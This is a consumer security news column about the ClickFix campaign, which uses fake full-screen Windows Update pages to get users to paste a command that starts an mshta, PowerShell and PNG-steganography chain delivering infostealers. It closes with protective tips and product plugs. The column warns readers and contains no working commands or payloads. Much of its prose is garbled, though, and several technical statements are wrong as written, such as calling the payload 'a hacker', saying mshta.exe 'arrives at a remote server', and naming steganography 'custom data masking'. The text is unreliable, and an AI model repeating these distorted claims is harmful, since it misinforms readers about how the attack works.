ClickFix campaign now uses fake Windows updates to spread malware

Cybercriminals continue to get better at integrating with the software you use every day.

Over the past few years, we’ve seen phishing pages that copy banking portals, bogus browser alerts claiming your device is infected, and “human verification” screens that prompt you to execute commands you should never touch. The latest development comes from Ongoing ClickFix campaign.

Instead of asking you to prove that you are a human, attackers now disguise themselves as a human Windows Update. It seems convincing enough that you might follow instructions without thinking, and that’s exactly what they want.

Sign up for my free CyberGuy report
Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – for free when you join my site CYBERGUY.COM Newsletter.

A NEW SCAM IS SENDING FAKE MICROSOFT 365 LOGIN PAGES

The malware hides inside seemingly ordinary image files and uses steganography to bypass traditional security tools. (Microsoft)

How does the fake update work?

Researchers note that ClickFix has upgraded its old trick. The campaign used to rely on human verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security demonstrated how the page displays fake progress bars, familiar update messages, and a prompt telling you to complete an important security update.

If you’re using Windows, the site will ask you to open the Run box, copy something from your clipboard and paste it into it. This “something” is a command that silently downloads the malware dropper. The final payload is usually a hacker, which steals passwords, cookies, and other data from your device.

The new email scam uses hidden characters to bypass previous filters

Fake update screens are becoming harder to detect, as attackers mimic Windows with near-perfect accuracy. (security atmosphere)

The moment you paste the command, the infection chain starts. First, the z file named mshta.exe arrives at a remote server and gets a script. To avoid detection, these URLs often use hex encoding of parts of the address and rotate their paths. The script then runs obfuscated PowerShell code filled with unwanted instructions to keep researchers away. Once PowerShell has done its job, it decrypts the hidden .NET assembly that acts as a loader.

Why is this attack so difficult to detect?

The loader hides its next step inside what looks like a regular PNG file. ClickFix uses custom data masking, a technology that hides confidential data within plain-looking content. In this case, the malware resides within the pixel data of the image. Attackers modify color values ​​in certain pixels, especially in the red channel, to include parts of shellcode. When you see the picture, everything looks normal.

The script knows exactly where the hidden data is located. It extracts the pixel values, decrypts them, and reconstructs the malware directly in memory. This means that nothing obvious is written to the disk. Security tools that rely on file scanning miss it, because the shellcode never appears as a standalone file.

Once rebuilt, the shellcode is injected into a trusted Windows process such as explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix activity It delivered information-stealing programs such as LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them back to the attacker with little noise.

Once the hidden code is loaded into a trusted Windows process, information thieves quietly begin collecting your data. (Kurt “CyberGuy” Knutson)

7 steps you can take to protect yourself from a ClickFix campaign

The best way to stay protected is to slow down for a moment and follow some steps that prevent these attacks before they start.

1) Never execute orders you did not request

If any site asks you to paste a command into Run, PowerShell, or Terminal, consider it an immediate warning sign. True operating system updates never require you to run commands from a web page. When you run this command, you give full control to the attacker. If you feel something strange, close the page and do not interact further.

2) Keep Windows updates inside Windows

Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up pretending to be a Windows update is almost always fake. If you see anything outside of the normal update path asking you to take action, ignore it and check the real Windows Update page yourself.

3) Use a reputable antivirus program

Choose A Security suite It can detect file- and memory-based threats. Stealth attacks like ClickFix avoid leaving obvious files for scanners to pick up. Tools with behavioral detection, sandboxing, and script monitoring give you a much better chance of detecting unusual activity early.

The best way to protect yourself from malicious links that install malware, and potentially access your private information, is to install strong antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.

Get my picks for the best antivirus protection winners of 2025 for Windows, Mac, Android, and iOS at Cyberguy.com.

4) Use a password manager

Password managers create strong, unique passwords for each account you use. It also autofills only on legitimate websites, which helps you spot fake login pages. If an administrator refuses to fill in your credentials, take a second look at the URL before entering anything manually.

Next, see if you have it Email has been exposed Past Breaches Our #1 choice of password manager includes a built-in penetration scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

5) Use a personal data removal service

Many attacks begin by targeting emails and personal details that have already been exposed online. Data removal services help reduce your digital footprint by requesting removals from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers can easily access your data.

While no service can guarantee complete removal of your data from the Internet, a data removal service is truly a smart choice. It’s not cheap, and neither is your privacy. These services do all the work for you by systematically monitoring and scraping your personal information from hundreds of websites. This gives me peace of mind and has proven to be the most effective way to clear your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches to information they might find on the dark web, making it harder for them to target you.

Check out my top picks for Data removal services And get a free check to see if your personal information is already on the web by visiting Cyberguy.com.

Get a free check to see if your personal information is already on the web: Cyberguy.com.

6) Check URLs before trusting anything

Compelling design does not mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses strange spelling or extra characters, close it. Attackers rely on the fact that people recognize the page design but ignore the address bar.

7) Close suspicious pages full screen

Fake update pages often run in full screen mode to hide the browser interface and make the page look like it’s part of your computer. If the site suddenly goes full screen without your permission, exit using Esc or Alt+Tab. Once you exit, scan your system and do not return to that page.

Key takeaway for Kurt

ClickFix works because it is based on user interaction. Nothing will happen unless you follow the on-screen instructions. This makes the fake Windows Update page particularly dangerous, because it exploits something most people trust. If you are accustomed to Windows updates freezing your screen, you may not question the prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to reduce your caution and then rely on you to run the final command. The technical tricks she follows are complex, but the starting point is simple. They need you to help them.

Have you ever copied commands from a website without thinking twice about what they are doing? Let us know by writing to us at Cyberguy.com.

Click here to download the FOX NEWS app

Sign up for my free CyberGuy report

Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – for free when you join my site CYBERGUY.COM Newsletter.

Copyright 2025 CyberGuy.com. All rights reserved.